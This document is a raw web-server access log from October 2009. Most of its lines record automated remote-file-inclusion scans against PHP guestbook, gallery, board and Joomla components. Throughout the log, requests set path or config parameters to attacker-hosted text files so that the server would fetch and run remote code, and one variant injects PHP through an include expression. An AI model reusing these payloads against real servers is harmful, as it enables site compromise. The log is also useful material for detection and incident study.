64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET /logs/access_log.1251504000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.207.99 - - [16/Oct/2009:07:21:31 -0500] "GET /logs/access_log.1142294400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.192.20.164 - - [16/Oct/2009:07:21:37 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:21:37 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:21:37 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:21:37 -0500] "GET /logs/access_log.1251504000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:07 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:07 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:27 -0500] "GET /logs/access_log.1243296000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:27 -0500] "GET /logs/access_log.1248912000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:29 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:29 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:49 -0500] "GET /logs/access_log.1243296000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:23:49 -0500] "GET /logs/access_log.1248912000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:26:24 -0500] "GET /logs//skin/daerew_46galleryGD/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:26:24 -0500] "GET //skin/daerew_46galleryGD/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:26:24 -0500] "GET /logs/access_log.1253404800//skin/daerew_46galleryGD/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:27:07 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:27:07 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:27:07 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:27:20 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:27:20 -0500] "GET /logs/access_log.1248912000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:27:20 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:27:24 -0500] "GET /logs/access_log.1243296000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:09 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:09 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:09 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:09 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:09 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:09 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:28:22 -0500] "GET /logs/access_log.1241481600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:28:29 -0500] "GET /logs/access_log.1244851200//components/calendar/com_calendar.php?absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
128.125.169.162 - - [16/Oct/2009:07:28:35 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
128.125.169.162 - - [16/Oct/2009:07:28:35 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
128.125.169.162 - - [16/Oct/2009:07:28:36 -0500] "GET /logs/access_log.1248220800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.133 - - [16/Oct/2009:07:29:01 -0500] "GET /logs/access_log.1218585600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.108.122.160 - - [16/Oct/2009:07:29:03 -0500] "GET /logs/access_log.1241481600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:29:06 -0500] "GET /logs/access_log.1241481600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:07:32:06 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:07:32:09 -0500] "GET /logs/access_log.1248480000//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:07:32:11 -0500] "GET /logs/access_log.1242691200//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:07:32:11 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:33:49 -0500] "GET //skin/zetyx_grayscale_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:33:49 -0500] "GET /logs//skin/zetyx_grayscale_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:33:49 -0500] "GET /logs/access_log.1251417600//skin/zetyx_grayscale_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.106.230 - - [16/Oct/2009:07:34:02 -0500] "GET /logs/access_log.1174521600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.192.20.164 - - [16/Oct/2009:07:34:18 -0500] "GET //skin/zetyx_grayscale_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:34:19 -0500] "GET /logs//skin/zetyx_grayscale_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:34:19 -0500] "GET /logs/access_log.1251417600//skin/zetyx_grayscale_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:35:23 -0500] "GET /logs/access_log.1248912000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:35:23 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:35:23 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:35:28 -0500] "GET /logs/access_log.1243555200/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:35:37 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:35:37 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:35:37 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.51.111 - - [16/Oct/2009:07:35:38 -0500] "GET /logs/access_log.1127520000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.108.122.160 - - [16/Oct/2009:07:36:14 -0500] "GET /logs/access_log.1236384000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
89.108.122.160 - - [16/Oct/2009:07:36:14 -0500] "GET /logs/access_log.1241481600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:38:44 -0500] "GET //skin/zetyx_purple_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:38:44 -0500] "GET /logs//skin/zetyx_purple_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:38:45 -0500] "GET /logs/access_log.1251417600//skin/zetyx_purple_category/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
212.102.32.56 - - [16/Oct/2009:07:44:00 -0500] "GET /logs/access_log.1253232000%22id=%22ttl_result_8%22accesskey=%227%22%3E%3Cb%3E%3C/b%3Efortpit%3Cb%3E%3C/b%3E.%3Cb%3E%3C/b%3Epconline%3Cb%3E%3C/b%3E.%3Cb%3E%3C/b%3Ecom%3Cb%3E%3C/b%3E%3C/errors.php?error=http://www.spidermma.net/cmdstate.txt?? HTTP/1.1" 404 493 "-""libwww-perl/5.79"
212.102.32.56 - - [16/Oct/2009:07:44:00 -0500] "GET /errors.php?error=http://www.spidermma.net/cmdstate.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
212.102.32.56 - - [16/Oct/2009:07:44:01 -0500] "GET /logs/access_log.1253232000%22id=%22ttl_result_8%22accesskey=%227%22%3E%3Cb%3E%3C/b%3Efortpit%3Cb%3E%3C/b%3E.%3Cb%3E%3C/b%3Epconline%3Cb%3E%3C/b%3E.%3Cb%3E%3C/b%3Ecom%3Cb%3E%3C/errors.php?error=http://www.spidermma.net/cmdstate.txt?? HTTP/1.1" 404 483 "-""libwww-perl/5.79"
212.102.32.56 - - [16/Oct/2009:07:44:01 -0500] "GET /logs/access_log.1253232000%22%3Ehttp:/fortpit.pconline.com/logs/access_log.1253232000%3C/errors.php?error=http://www.spidermma.net/cmdstate.txt?? HTTP/1.1" 404 382 "-""libwww-perl/5.79"
212.102.32.56 - - [16/Oct/2009:07:44:09 -0500] "GET /logs/access_log.1253232000%22%3Ehttp:/fortpit.pconline.com/logs/errors.php?error=http://www.spidermma.net/cmdstate.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
128.125.169.162 - - [16/Oct/2009:07:44:28 -0500] "GET /logs/access_log.1251417600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:07:45:48 -0500] "GET /logs/access_log.1248912000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:07:45:49 -0500] "GET /logs/access_log.1243555200/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:07:45:49 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:07:45:49 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:46:49 -0500] "GET //skin/zetyx_purple/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:46:49 -0500] "GET /logs//skin/zetyx_purple/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:46:49 -0500] "GET /logs/access_log.1251417600//skin/zetyx_purple/setup%20php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:48:00 -0500] "GET /logs//skin/daerew_46galleryGD/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:48:00 -0500] "GET /logs/access_log.1253404800//skin/daerew_46galleryGD/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:48:00 -0500] "GET //skin/daerew_46galleryGD/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:07:48:36 -0500] "GET //skin/jiyoo_red/login.php?dir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:07:48:36 -0500] "GET /logs//skin/jiyoo_red/login.php?dir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:07:48:36 -0500] "GET /logs/access_log.1252281600//skin/jiyoo_red/login.php?dir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.207.98 - - [16/Oct/2009:07:50:01 -0500] "GET /logs/access_log.1161907200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.90.176.25 - - [16/Oct/2009:07:53:56 -0500] "GET /logs//skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:53:56 -0500] "GET //skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:07:53:56 -0500] "GET /logs/access_log.1251331200//skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:54:13 -0500] "GET //skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:54:13 -0500] "GET /logs//skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:54:13 -0500] "GET /logs/access_log.1251331200//skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:07:54:13 -0500] "GET /logs/access_log.1252713600//skin/sirini_ezset/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:08:01:47 -0500] "GET //?path%5Bdocroot%5D=http://feelstory.net/.../id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:08:01:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://feelstory.net/.../id1.txt??? HTTP/1.1" 200 209042 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:08:01:47 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:11 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:11 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:14 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:08:02:17 -0500] "GET //setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:08:02:17 -0500] "GET /logs//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:08:02:17 -0500] "GET /logs/access_log.1250899200//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:19 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:23 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:23 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:23 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:02:23 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:46 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:49 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:49 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:52 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:52 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:02:53 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:08:03:17 -0500] "GET /logs/access_log.1239667200//?path%5Bdocroot%5D=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:03:17 -0500] "GET /logs//write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:03:17 -0500] "GET //write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:03:17 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:08:03:17 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:03:19 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:03:19 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:03:19 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:03:27 -0500] "GET /logs/access_log.1250467200//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.207 - - [16/Oct/2009:08:03:30 -0500] "GET /logs/access_log.1147046400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.150.183.219 - - [16/Oct/2009:08:03:31 -0500] "GET //write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:08:03:31 -0500] "GET /logs//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
